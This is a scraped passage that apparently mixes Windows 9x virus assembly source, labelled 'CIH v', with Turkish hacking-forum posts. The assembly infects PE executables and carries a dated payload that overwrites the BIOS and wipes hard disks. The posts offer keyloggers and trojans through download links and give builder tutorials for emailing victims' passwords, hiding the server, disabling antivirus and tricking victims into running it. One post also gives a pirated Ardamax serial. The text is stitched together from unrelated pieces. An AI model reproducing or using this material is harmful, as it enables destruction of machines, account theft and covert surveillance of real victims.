xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-[at]7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
xor ecx, ecx
mov cl, 04h
xor edx, edx
mov dl, 3ch
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> [at]8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-[at][esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]
mul cl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-[at]FPRIVATE "TYPE=PICT;ALT=Cool"[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-[at]9)[esi]
jnc short OnlySetInfectedMark
not ecx
inc ecx
cmp cx, small CodeSizeOfMergeVirusCodeSection
jb OnlySetInfectedMark
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-[at]9)[esi]
add eax, (ImageBase-[at]9)[esi]
mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax
push edx ; Pointer of File
add eax, esi
push eax ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [eax+edi-04h]
mov [eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-[at]9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-[at]9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-[at]9)[edx]
sub ebx, (VirtualSize-[at]9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-[at]9)[edx]
add ebx, (VirtualSize-[at]9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-[at]9)[edx]
add ebx, (VirtualAddress-[at]9)[edx]
add ebx, (ImageBase-[at]9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-[at]9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-[at]9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp
; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-[at]9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-[at]7)[esi]
mov edi, (FileModificationTime+2-[at]7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-[at]6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Month from BIOS CMOS
mov ax, 0708h
out 70h, al
in al, 71h
xchg ah, al
; Get Now Day from BIOS CMOS
out 70h, al
in al, 71h
xor ax, 0426h ; 04/26/????
jne DisableOnBusy
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-[at]7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-[at]10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-[at]10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ************************************************** *
; * IOR Structure of IOS_SendCommand Needs *
; ************************************************** *
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ************************************************** *
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
[at]10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; ************************************************** *******
; * Virus Version Copyright *
; ************************************************** *******
VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TTIT'
; ************************************************** *******
; * Virus Size *
; ************************************************** *******
VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
; * Dynamic Data *
; ************************************************** *******
VirusGameDataStartAddress = VirusSize
[at]6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
[at]7 = FileNameBuffer
DataBuffer = $
[at]8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
[at]9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = [at]9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRe********s = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRe********s = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName
; ************************************************** *******
; * Virus Total Need Memory *
; ************************************************** *******
VirusNeedBaseMemory = $
VirusTotalNeedMemory = [at]9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; ************************************************** *******
VirusGame ENDS
END FileHeader
İşte videolu Keylogger yapımı kodlarla birlikte !!
Evet arkadaşlar videolu log alan keylog anlattım videomda video
bana aittir ama kodlar alıntıdır.
Buyrun Link :
https://rapidshare.com/files/1042748...HaCKeR_Log.rar
Keyloggersız Bilgisayara Bağlanmak İsteyenlere!
Öncelikle Merhaba Arkadaşlar.
Size İmkansızı Sunayım Yine
Virüs Yemek imkansız Hale Geldi, Ya %100 Fud Bir Trojan Yazıcağız Desem?
Ya Bir De Bunun İçin Okuma Yazma Bilmek Yeter Desem Bir De?
Yok Artık Değil Bu Gerçek
İşte Videomuz:
DosyaUpload.NeT - File Upload Free File Hosting Dosya Upload Files Upload File Upload Swf Upload
Dosya Upload File Upload Free File Hosting Dosya Upload Files Upload Files Uploads File Upload image upload images upload Free File Hosting @ - dosyasitesi.com
Şifre: turkhackteam.net
Umarım Linkler Kırılmaz
Bir De Araç gereçleri Vereyim:
Essential NetTools 4.3 Yapı 264 - Detayli Tanitimi, Kullanici Yorumlari - innDir.com
Umarım Açıklayıcı Olmuşumdur
VatosAjan 2.4
VatosAjan bulaştığı bilgisayarın özelliklerini,kurbanın şifre ve keylog kayıtlarını mailinize gönderen
Bünyesinde bulunan FTP Server ile kurbanın bilgisayarına bağlanılabilen,Sadece VatosAjan’da bulunan
WEB KONTROL özelliği ile router veya direk bağlantı farketmeksizin kurbanın bilgisayarında dosya arama,
dosya silme,istediğiniz dosyaları mailinize gönderme,
downloader gibi çalışıp, istediğiniz dosyaları internetten indirip çalıştırabilme,
mail adresinizi değiştirebilme,registry kayıtlarına ulaşabilme ve kendisini silme emirlerini
uygulayabilecek interaktif bir casus yazılımdır.
VatosAjanın alabildiği şifreler aşağıda yazılmıştır.
Versiyon Farkları;
-Win9x sistemlerde stabil çalışması sağlandı
-FTP Server eklendi
-Server ve serverin kullandığı dosyalar disk üzerinde gizlendi
-Kullanılan componentler değiştirildi
-Firewall ve Antivüslerin kapatılması sağlandı
-Web Kontrol için firewall By Pass edildi
-Servere ayar işleme yöntemi değiştirildi
-Serverin başka bir dosya ile birleşince simgesinin korunması sağlandı
-İlk Çalıştırılma esnasında sahte hata uyarısı verebilme özelliği eklendi
-icon seçim yöntemi değiştirildi.Böylece kendi iconlarınızı da kullanabileceksiniz.
-Server Uzantısını değiştirebilme imkanı eklendi
-Client görünümü ve logo değiştirildi
-Türkçe ve İngilizce Dil Seçeneği eklendi
///////Alınabilen Şifreler\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\
# MSN Messenger
# Windows Messenger (In Windows XP)
# Yahoo Messenger (Versions 5.x and 6.x)
# ICQ Lite 4.x/2003
# AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered)
# AOL Instant Messenger/Netscape 7
# Trillian
# Miranda
# GAIM
# Outlook Express
# Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
# Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts)
# IncrediMail
# Eudora
# Netscape 6.x/7.x
# Mozilla Thunderbird
# Group Mail Free
# Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
# Hotmail/MSN mail - If the password is saved in MSN Messenger application.
# Gmail
#Otomatik tamamlanan Internet Explorer şifreleri,
#MSN Explorer Şifreleri
Download : Hotfile.com: One click file hosting: VatosAjan.rar
Beni Oku (Şaka Virüsü)
Benim hoşuma gittiği için paylaşıyorum Şaka olduğunu Bilmeyenler gerçekten kalpten gidebilir yani 
İndirme Linki ;
Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Not : Alıntıdır.
007 Casus
Easy Logger 1
kendi yazdığım grafikleri ve grafikleri çok basit bir programı paylaşmak istiyorum.
-%10 Fudsuz %90 Fudludur
-Loglar sağlam sayılır.
Resim:http://g1206.hizliresim.com/y/s/8nnqx.jpg
Link:Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Virüs:Scan Result | Element Scanner
Versiyon 2 de daha özellikli bir program yapacağım ins
Size İmkansızı Sunayım Yine
Virüs Yemek imkansız Hale Geldi, Ya %100 Fud Bir Trojan Yazıcağız Desem?
Ya Bir De Bunun İçin Okuma Yazma Bilmek Yeter Desem Bir De?
Yok Artık Değil Bu Gerçek
İşte Videomuz:
DosyaUpload.NeT - File Upload Free File Hosting Dosya Upload Files Upload File Upload Swf Upload
Dosya Upload File Upload Free File Hosting Dosya Upload Files Upload Files Uploads File Upload image upload images upload Free File Hosting @ - dosyasitesi.com
Şifre: turkhackteam.net
Umarım Linkler Kırılmaz
Bir De Araç gereçleri Vereyim:
Essential NetTools 4.3 Yapı 264 - Detayli Tanitimi, Kullanici Yorumlari - innDir.com
Umarım Açıklayıcı Olmuşumdur
Asseletion Keylogger Full//%100 (Resimli)+(Videolu Anlatım)+(İndir)
Asseletion Keylogger
Merhaba Arkadaşlar
Öncelikle Herkese Tavsiyem olan
Asseletion Keylogger Bu konu daha çok çok önceden
Açılmıştır Fakat Linkleri ölmüş videolu anlatım kalmamıştır
------------------------------------------------------------------
Ve Alıntı Olanlar
1-Videolu Anlatım Bana Ait Değildir
2-İndirme Linki Bana Ait Değildir
Fakat sunum ve indirme Linki+Videolu Anlatım Linki Bozuk
Değildir Test Ettim Ayrıca Biliyoruz ki Her Keylogger da virus vardır
İşte Virus Sonuçları
File InfoEvet Virus Tarama Sonuçları
Report date: 2010-10-03 14:54:22 (GMT 1)
File name: stub-exe
File size: 51200 bytes
MD5 Hash: c5e6cdf4162b4841e744a8cd73fb35b6
SHA1 Hash: 825929b295b5baacc98641937f875b40a075e5f6
Detection rate: 11 on 16 (69% )
Status: INFECTED
Detections
a-squared – Trojan-Spy.MSIL!IK
Avast – MSIL:KeyLogger-C [Spy]
AVG – PSW.Generic7.BIHF
Avira AntiVir – TR/Comisproc.A.53
BitDefender – Trojan.Generic.3022901
ClamAV -
Comodo – TrojWare.Win32.Trojan.Generic.30229010
Dr.Web -
F-PROT6 -
Ikarus T3 – Trojan-Spy.MSIL
Kaspersky – Trojan-Spy.MSIL.KeyLogger.zb
NOD32 – MSIL/KillProc.A
Panda -
TrendMicro -
VBA32 – TrojanSpy.MSIL.KeyLogger.adz
VirusBuster – Trojan.Bumat.HZT
Scan report generated by
NoVirusThanks.org
Kara-Kötü gözükebilir fakat Gerçekten Pc ye zararı
Yoktur ve Kimse Binder'lememiştir kendim test ettim
------------------------------SORUMUSU BEN DEĞİLİM--------------------------
1-Eğer Kullanımını Bilmiyorsanız ki Anlattım fakat yanlışlık ile
Server.exe oluşturup kendi pc nizde açarsanız sorun olabilir
2-Eğer Başka bir pc yollarsanız ve dava açılırsa
farkedilip başlıkta belirttiğim gibi
3-Eğer Kişilerin Msn sini Çalıp Bu THT üyelikleri için kullanırsanız
Çok Ayıp olur ve bununda başlıkta belirttiğim gibi
------------------------------ASSELETİON Logger (Keylogger)-----------------
Bu Keylogger 'ın kullanımı için
Bir resim şart zaten biliyorsunuz ki
Aramızda bilmeyenler var onlara yardımcı olalım
1.Resim
Gördüğümüz gibi
Şimdi
1.Yapacağımız
Gmail Username; Gmail Adresinizi verin
Ör; tyl3@gmail.com
gibi
2.Yapacağımız
Gmail Password; Gmail Şifrenizi verin;
ör; ssasvvvav tabi bu böyle oluyor; *********
3.Yapacağımız
Burada Keyloggerımızın en güzel özelliği
"Server.exe" bunu istediğimiz uzantı ile yapabiliyoruz
Örneğin;
"Metin2hack.jpg"
"Metin2hack.exe"
"High Hacker.fpb"
"Obaa.txt"
"ZAA.XD"
"PcChoLikkardeşim.exe"
4.Yapacağımız Logların süresini belirler
burayı artık siz ayarlayın anlatmaya gerek yok
Mouse1.click ve Mouse2.click i kullanın
5.Yapacağımız (İsterseniz)
Error Message yani Kişi serverı açtığında
Anlamasın diye hata msj ı verir açıldığı anda
Eğer hata msj vermek istiyorsanız (önerilir)
Enabled Error Creation
a tıklayın
ve Hata msj ınızın başlığını
1.textboxa hatayıda 2.textboxa yazın
6.Yapacağımız
Burası zaten anlatmama gerek yok
sadece byte boyutunu ayarlayıp PUMP seçeneği
le gerekli ayarlamaları yapın yapayada bilirsiniz
ama yapmanız kesinlikle önerilir fakat abartmayın
1gb falan 7.Yapacağımız en güzeli
Burada
Özellikler bulunur
1.si başlangıç kesinlikle işaretleyin
2.si Antilere Yakalanmaz (Kapatır)
3.si Görev yöneticisi ortadan Kalkar çünkü taskı siler system32 den
istediğinizi yapmak için işaretleyin
fakat 1.yi kesin işaretleyin çok önemli çok
Ve oluşturmak için Test edinilk önce gmail ile şifresi doğruysa
Test Mail de olumlu İ çıkar gmail ile şifre yanlış ise e verir
Daha sonra Builde tıklayıp loggerın bulunduğu yere keyloggerınız
gelir
----------------------------------NOT--------------------------------
Stub+Keylogger
bu iki önemli dosyayı (.exe)'yi lütfen
Aynı Klasörde tutunuz yoksa hata oluşur
------------------------------HİGH HACKER---------------------------------
SUNAR..
Yorumlarınızı / Teşekkürlerinizi
Bol Keseden Verin
Saygılar
-------------------------------İNDİRME YOKMU ?
---------------------------Unutmuşum Gidiyorum
Videolu Anlatım
http://rapidshare.com/files/44216865...latae_mae_.wmv
İndirme Linki
Multiupload.com - upload your files to multiple file hosting sites!
İndirme Linki 2
Multiupload.com - upload your files to multiple file hosting sites!
İndirme Linki 2 'nin Rar Pass
deso.us
----------------------------NOT--------------------------
iNdirme Linki Alıntıdır
Fakat eğer herhangi bir pc
nize birşey olursa ki denedim
fakat ginede olursa sorumlusu ben değilim
Saygılar
Ardamax Keylogger 3.7 Full Serial Key Video Anlatım //ChoqFena
//ChoqFena// - //TÜRK HACK TEAM//
Merhaba Arkadaşlar Sizlere Bu Videomda Ardamax Keylogger
3.7 Kurulumu Anlatacağım.
*Lisans Sözleşmesini Kabul Edin.
*Önünüze 3Tane İşaretlemeniz Gereken Kutucuk Gelecek
*Onların 3'ü de İşaretli Olsun ( √ )
*Daha Sonra Kuracağınız Alanı Seçiniz.
*Ve InsTall Basınız.
*Kurulum Bitince 2Tane Kutucuk Gelecek Onları ( √ ) İşaretli Olsun.
*Ve Finish Diyin.
//ChoqFena// - //TÜRK HACK TEAM//
--Ürünümüzü Aktifleştirme--
*Sağ Alt Köşede Ardamax Keylogger Simgesi Çıkacaktır.
*Ardamax Keylogger İşaretine Sağ Tıklayın Ve Kayıt Kodunu Girin.
Name: Luiz Ricardo P Oliveira
Serial: 3F1A-54F8-032C
//ChoqFena// - //TÜRK HACK TEAM//
--Keylogger Oluşturma--
*Arkadaşlar Şimdi Keyloggerımızı Oluşturabiliriz.
*Sağ Tıklayın Ardamax Simgesine (Sağ Alt Köşede Olana)
*Uzaktan Kurulum Deyin.
*İleri Deyin.
*Olduğu Gibi Kalsın İleri Deyin.
*Hepsi ( √ ) İşaretli Olsun İleri Deyin.
*Şifre Değiştir Çıkarsa . Şifre Koyun.
*Hepsi ( √ ) İşaretli Olsun İleri Deyin.
*Başlangıçta Çalıştır Deyin. İleri Deyin.
*Tüm Kayıtları Gönder Deyin. Oradan Gün Dakika Ayarlayabilirsiniz.
*E-Mail Soracak Sizden
- Alıcıya E-mailinizi Yazın
- Kullanıcı Adına E-mailinizi Yazın
- Şifrenizi Yazın.
- Başka Birşeye Ellemeyin İleri Deyin.
- Garanti Olsun Diye Test Edebilirsiniz. TEST Tuşuna Basın Ve E-mailinizi Kontrol Edin.
*İleri Deyin.
*Ekran Görüntüsü Alma. Ayarlayabilirsiniz Kendinize Göre.
*WebCam Görüntüsü Alma Ayarlayabilirsiniz Kendinize Göre.
*Ve Sonuna Geldik Sayılır.
*Hangi Dosyayla Birleştireceğinizi Seçiniz.
*İkon Değiştirebilirsiniz.
*İleri Deyin Ve Sona Tıklayın.
Kurduğunuz
Artık Bunu Kurbana Yedirebilirsiniz
Videolu Anlatım Linki
Dosyalar İçinde Bulunmaktadır.
Dosya Tc
Alıntı:
| http://s2.dosya.tc/server6/1PZqgo/ChoqFenaTurkHackTeam.rar.html |
Alıntı:
| http://hotfile.com/dl/143217481/e625f6b/ChoqFena_Turk_Hack_Team.rar.html |
Alıntı:
| http://www.mediafire.com/?1zbj5b69ndgbncu |
Alıntı:
| http://www.fileserve.com/file/GmAzt9S/ChoqFena Turk Hack Team.rar |
Alıntı:
Yok Ben Sadece Ardamax Keylogger İndirmek İstiyorum
Videolu Anlatıma Gerek Yok Diyorsanız Buyrun
Dosya Tc
Alıntı:
| http://s2.dosya.tc/server13/hjxFfM/ChoqFenaTurkHackTeam.rar.html |
Alıntı:
| http://www.mediafire.com/?lhiy3erfyyfodax |
Alıntı:
| http://www.fileserve.com/file/EaYQPt5/Ardamax_Keylogger_3.7.rar |
Alıntı:
| http://www.uploadic.com/ixe5rfi5l1dc |
Eğer Gerçekten İşinize Yaradıysa Veya Beğendiyseniz Anlatımımı Teşekkür Etmeniz Yeterlidir.
Anti-Virüs ' ler Hakkında Bilmedikleriniz
Merhaba;
